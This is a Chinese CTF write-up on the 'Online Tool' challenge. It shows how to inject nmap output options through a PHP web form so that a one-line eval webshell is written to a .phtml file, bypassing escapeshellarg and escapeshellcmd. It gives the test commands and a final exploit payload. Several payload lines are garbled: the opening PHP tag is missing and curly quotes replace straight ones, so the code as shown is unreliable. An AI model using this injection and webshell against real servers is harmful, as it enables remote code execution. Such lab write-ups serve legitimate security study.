[2020年朱雀杯] 和 [BUUCTF 2018]Online Tool的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时escapeshellarg和escapeshellcmd 两个函数所进行的步骤。
关于nmap的输出命令:
翻阅nmap中文手册,发现主要只有四种:
其中主要就是 -oN 和 -oG 为主,我们看一下他们的区别:(本地测试一下)
不难发现两件事:
接下来我们来研究一个有意思的东西:
如果使用nmap写入一句话木马不用引号包起来会怎么样:
直接输入的话是无法生成文件的,必须给= @ eval($_REQUEST[1]);?>引号包起来才能正确执行命令,除此之外还有什么办法能执行呢。
!! \转义 !!
!! \转义 !!
!! \转义 !!
把这些会引起歧义的符号全部转义就能执行命令,并且将木马生成在php文件中。这将对绕过 escapeshellarg 和 escapeshellcmd 很有用
进入页面,先输入127.0.0.1看一下会怎么样
发现结果和我们本地非常相似:
再尝试一下命令:
127.0.0.1 | ls
可以看到本地是可以执行的,那我们试一下题目环境
发现被转义了
只能另辟蹊径,我们直接试着写入一句话木马
‘’ -oN 1.php
结果发现回显是Hacker,可能把php过滤了
1.在一句话木马中的解决办法
利用短标签:=eval($_GET[1])?>
后缀为php的解决办法
后缀改为phtml,也会解析成php文件
接下来再试着写入一句话木马:
=eval($_GET[1])?> -oN 1.phtml
回显是这个,但是我们访问1.phtml,发现并没有生成,是函数escapeshellarg和escapeshellcmd在作怪。
要了解如何绕过,那就得先了解一下这两个函数的分别作用
看了描述之后再看一下这两个函数的例子:
$a = "' = @eval(\$_REQUEST[1]);?> -oG test.phtml '";
echo "escapeshellarg:".escapeshellarg($a)."";
$a = escapeshellarg($a);
echo "escapeshellcmd:".escapeshellcmd($a)."";
输出
escapeshellarg:‘’\‘’= @eval($_REQUEST[1]);?> -oG test.phtml’\‘’’
escapeshellcmd:‘’\\‘’<\?= @eval$REQUEST\[1\]\;\?\> -oG test.phtml’\\‘’’
如果我们把两个函数处理过的字符串直接用nmap尝试写入文件能成功吗
很显然,答案是可行的如此一来便绕过了escapeshellarg和escapeshellcmd
接下来就是连接木马巴拉巴拉
exp:
’ = @eval($_REQUEST[1]);?> -oG test.phtml ’
这个引号和 < 之间要记得留空格,否则 < 会被转义,一句话木马就失效了
本来其实是不知道对 [ ] ? 等符号也进行转义之后因为 nmap 写入文件恰好需要那些转义才刚好写进去。自己研究了这么久才意外发现也是很惊喜,之前对namp不甚了解的时候做过[2018BUUCTF]类似的题型,没有完全了解,今天查阅很多资料+实践才发现这些奥秘的,希望对你也有帮助。
https://paper.seebug.org/164/ => PHP escapeshellarg()+escapeshellcmd() 之殇